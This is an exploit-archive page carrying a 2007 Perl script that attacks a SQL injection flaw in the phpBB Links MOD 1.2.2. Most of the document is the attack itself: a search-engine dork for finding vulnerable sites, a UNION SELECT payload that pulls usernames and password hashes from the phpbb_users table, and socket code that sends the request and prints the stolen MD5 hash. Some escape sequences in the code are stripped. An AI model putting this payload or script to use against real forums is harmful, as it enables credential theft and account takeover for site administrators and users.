[Exploit] [Remote] [Local] [Web Apps] [Dos/Poc] [Shellcode] [RSS]
# Title : phpBB Links MOD 1.2.2 Remote SQL Injection Exploit
# Published : 2007-08-31
# Author : Don
# Previous Title : Joomla! 1.5 Beta1/Beta2/RC1 Remote SQL Injection Exploit
# Next Title : CKGold Shopping Cart 2.0 (category.php) Blind SQL Injection Exploit
#!/usr/bin/perl
print q{
phpBB <= 2.0.22 - Links MOD <= v1.2.2 Remote SQL Injection Exploit
Bug discovered by Don
Dork: allinurl:links.php?t=search
or: "Links MOD v1.2.2 by phpBB2.de"
SQL INJECTION: Exploit: links.php?t=search&search_keywords=asd&start=1,1%20UNION%20SELECT%201,username,user_password,4,5,6,7,8,9,10,11,12%20FROM%20phpbb_users%20WHERE%20user_id=2/*
};
use IO::Socket;
print q{
=> Insert URL
=> without ( http )
=> };
$server = <STDIN>;
chop ($server);
print q{
=> Insert directory
=> es: /forum/ - /phpBB2/
=> };
$dir = <STDIN>;
chop ($dir);
print q{
=> User ID
=> Number:
=> };
$user = <STDIN>;
chop ($user);
if (!$ARGV[2]) {
}
$myuser = $ARGV[3];
$mypass = $ARGV[4];
$myid = $ARGV[5];
$server =~ s/(http://)//eg;
$path = $dir;
$path .= "links.php?t=search&search_keywords=asd&start=1,1%20UNION%20SELECT%201,username,user_password,4,5,6,7,8,9,10,11,12%20FROM%20phpbb_users%20WHERE%20user_id=".$user."/*";
print "
Exploit in process...rn";
$socket = IO::Socket::INET->new(
Proto => "tcp",
PeerAddr => "$server",
PeerPort => "80") || die "Exploit failed";
print "Exploitrn";
print "in process...rn";
print $socket "GET $path HTTP/1.1rn";
print $socket "Host: $serverrn";
print $socket "Accept: */*rn";
print $socket "Connection: closernrn";
print "Exploit finished!rnrn";
while ($answer = <$socket>)
{
if ($answer =~/(w{32})/)
{
if ($1 ne 0) {
print "MD5-Hash is: ".$1."rn";
}
exit();
}
}
# www.Syue.com [2007-08-31]